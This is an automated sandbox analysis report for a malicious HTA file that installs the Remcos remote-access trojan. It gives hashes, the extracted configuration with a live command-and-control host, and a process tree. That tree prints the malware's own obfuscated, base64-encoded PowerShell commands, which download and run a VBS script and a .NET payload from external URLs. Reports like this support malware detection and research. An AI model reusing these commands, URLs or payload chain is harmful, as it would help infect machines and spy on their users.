Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-12-2024 02:43

General

  • Target

    7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta

  • Size

    144KB

  • MD5

    920910732ff13da38fab9224e65041d6

  • SHA1

    844226d370dc471fa282eaad9e8dabaf59963902

  • SHA256

    7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544

  • SHA512

    1efe02ba682bd628bacebebe8f283276c1ebc6db3bcc3956c59b840d3677d94a6ca18f95182daf8a5d1587a830b2a2cc69d6a9c31a2672c29f8aa294e19cebf7

  • SSDEEP

    768:t1EQuPoGCMum2oum2H5KUJDVUKhCoGVf/Atu360KuBxvmm0wYWzP9k4/k4/k4/kk:tG

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

submarrine.duckdns.org:6946

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GH3PRL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1020
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qux0ctt1\qux0ctt1.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1064
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\qux0ctt1\CSCB0F4FF365F214E3DAA7B70544C28D618.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1828
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1128
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4988
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:696

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    4a3478691ddfadb5e7b085d0a34532cc

    SHA1

    878c035b8411c485e076511d9d83404fa63fdab3

    SHA256

    8f8bdb57997fb29578cf4ead2241359bf8e70f145828575790fa11adcd468136

    SHA512

    c9dc965c77fb9e3b686bc6442598027766dc27087d7630b22f44fc0069b6a88689c23cdec443a32e9db2e2e0875f6a32f206f73d358a8d0c2c427a78b9c7c992

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    19KB

    MD5

    44e9ea091101ff377e2a37f04b97f631

    SHA1

    895ab4515119ec42294408b165f91d5f0cc9bf56

    SHA256

    4d0fd87da6704f987ecabd75a959505a983e3db59c33edc0858e815b5c5e5d40

    SHA512

    1d87586f232269d1f1c66adc68958f6e0f9423ed33d7ed427c78522f41f59df97d65467f767927f74345d6912f19c893b11a175f19e1293cd63095855ff74066

  • C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp

    Filesize

    1KB

    MD5

    05e24cea7729bf5c8cb9e5ac3ef244c4

    SHA1

    b42cec8622276dbd1535abc5dd8656118dc33ca8

    SHA256

    32758af53b72c1727a465c26e59de216d1bca9077e12f04063d5ad6e06b0b08f

    SHA512

    921c4359f4f31da690b8fef65e7bde112e4b7165635b86e74a4af3a8d9555fc6f73fda9875aa0308c56305be6d2d05580e80ae74bc527c0e9d1e35d63e21d426

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scgdunuv.rzy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\qux0ctt1\qux0ctt1.dll

    Filesize

    3KB

    MD5

    26f4fdbfc371be3bbc0391e252ac18a7

    SHA1

    b5bd92a1a2cce812c472de0db9b79addf101cd39

    SHA256

    f7cf716787ee8c157531179450d178a04ece69fb4f46a16891d7fdd8564a070d

    SHA512

    210fa195425ca1674bd3272e7c5fb6b3006dd37003279d3e3b493500ae0e43aafe569001106becb39798c686b97d18dc60a5baeb5a675e8aa6467a514b9b38e6

  • C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS

    Filesize

    150KB

    MD5

    622118455f9b3d92190edecb9f5a70e4

    SHA1

    ec47a3f75a1a3e197a2745f75015160da5190d76

    SHA256

    d9b6d65cd5e6206ccb41a4d12a0a1cf8d55de31d786cf085d9632e5eaf66914a

    SHA512

    3af7582cd5b8e7ddd5c23f5477fa3f595fdb851e0b7faf51f167c716b0a50ca4cc6af824b8409ca5745ccc72bc56bbfe201c3b6a7630f04a6e2e84ee248bcf91

  • \??\c:\Users\Admin\AppData\Local\Temp\qux0ctt1\CSCB0F4FF365F214E3DAA7B70544C28D618.TMP

    Filesize

    652B

    MD5

    550d83edb2a7f1a2c22e33fd09874e89

    SHA1

    5aa2c1e3e6be911590252d4cfe3e02bbfd501756

    SHA256

    f24ec553b783e673a5eabe739f230660370c846a6d5d96c3bd5f2d172412f4c9

    SHA512

    8d7a91579f01015a4f256ab7cbba8fc652c7b477fffc572397fb2a29f935f4a0e3ef9dc15cf97c82adcdccdecefaff2f9bd1afc4eb0ac21484f670c358024fd7

  • \??\c:\Users\Admin\AppData\Local\Temp\qux0ctt1\qux0ctt1.0.cs

    Filesize

    498B

    MD5

    dcfc222ae4a88432f5653314f96c284c

    SHA1

    f38c92dfe6c331d9eede174861c22b5cb24d1236

    SHA256

    65b8df15d3df5605ff17738e203c4ad07a534be67bbb493d36a5ef1cbff2733e

    SHA512

    75d2ace08f5908213cf61ccc5c378871d0b5ce47e98221e8c49f4f758216ae0a606799064011011d713c0187c2722700f808fe5138a0cd4320870251c70ecaf7

  • \??\c:\Users\Admin\AppData\Local\Temp\qux0ctt1\qux0ctt1.cmdline

    Filesize

    369B

    MD5

    4d191ef89afa1f753542010b872d57b4

    SHA1

    95317badd5766fa22d394c27a5484543dc4bdadf

    SHA256

    3ea9c9f22dea3cef36cd8de5679d174ba1c4a278225367db33d0fe89e0ed0763

    SHA512

    14a70ce98431af6987cf68a7d453f40c6e4c74a03e20cc11bc84a14ed561b5b4e9c470a0b2d835bca14364a2ac399724c882d4d26aa524baeeb873a5d6834e4b

  • memory/696-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-157-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-156-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-154-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-153-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-152-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-151-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-150-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-149-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-148-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-144-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-141-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-140-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-138-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-136-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-134-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-129-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-127-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-124-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-85-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-86-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-88-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-103-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-94-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-95-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-96-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-97-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-98-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-99-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-101-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-102-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-93-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-120-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-106-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-108-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-109-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-110-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-111-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-112-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/696-118-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1020-64-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-16-0x00000000060D0000-0x0000000006424000-memory.dmp

    Filesize

    3.3MB

  • memory/1020-38-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

    Filesize

    40KB

  • memory/1020-21-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-22-0x000000006D680000-0x000000006D9D4000-memory.dmp

    Filesize

    3.3MB

  • memory/1020-2-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-0-0x0000000070C2E000-0x0000000070C2F000-memory.dmp

    Filesize

    4KB

  • memory/1020-32-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

    Filesize

    120KB

  • memory/1020-3-0x0000000005950000-0x0000000005F78000-memory.dmp

    Filesize

    6.2MB

  • memory/1020-70-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-4-0x00000000057B0000-0x00000000057D2000-memory.dmp

    Filesize

    136KB

  • memory/1020-1-0x0000000002D50000-0x0000000002D86000-memory.dmp

    Filesize

    216KB

  • memory/1020-65-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-20-0x000000006D4E0000-0x000000006D52C000-memory.dmp

    Filesize

    304KB

  • memory/1020-63-0x0000000070C2E000-0x0000000070C2F000-memory.dmp

    Filesize

    4KB

  • memory/1020-57-0x0000000007CE0000-0x0000000007CE8000-memory.dmp

    Filesize

    32KB

  • memory/1020-5-0x0000000005F80000-0x0000000005FE6000-memory.dmp

    Filesize

    408KB

  • memory/1020-6-0x0000000006060000-0x00000000060C6000-memory.dmp

    Filesize

    408KB

  • memory/1020-17-0x0000000006710000-0x000000000672E000-memory.dmp

    Filesize

    120KB

  • memory/1020-18-0x0000000006750000-0x000000000679C000-memory.dmp

    Filesize

    304KB

  • memory/1020-44-0x0000000007CE0000-0x0000000007CE8000-memory.dmp

    Filesize

    32KB

  • memory/1020-43-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

    Filesize

    104KB

  • memory/1020-42-0x0000000007CB0000-0x0000000007CC4000-memory.dmp

    Filesize

    80KB

  • memory/1020-41-0x0000000007CA0000-0x0000000007CAE000-memory.dmp

    Filesize

    56KB

  • memory/1020-40-0x0000000007C70000-0x0000000007C81000-memory.dmp

    Filesize

    68KB

  • memory/1020-39-0x0000000007D10000-0x0000000007DA6000-memory.dmp

    Filesize

    600KB

  • memory/1020-37-0x0000000005430000-0x000000000544A000-memory.dmp

    Filesize

    104KB

  • memory/1020-36-0x0000000008100000-0x000000000877A000-memory.dmp

    Filesize

    6.5MB

  • memory/1020-35-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-34-0x0000000070C20000-0x00000000713D0000-memory.dmp

    Filesize

    7.7MB

  • memory/1020-33-0x00000000079D0000-0x0000000007A73000-memory.dmp

    Filesize

    652KB

  • memory/1020-19-0x00000000076D0000-0x0000000007702000-memory.dmp

    Filesize

    200KB

  • memory/4988-81-0x0000000005470000-0x00000000057C4000-memory.dmp

    Filesize

    3.3MB

  • memory/4988-83-0x0000000007090000-0x0000000007214000-memory.dmp

    Filesize

    1.5MB

  • memory/4988-84-0x0000000007210000-0x00000000072AC000-memory.dmp

    Filesize

    624KB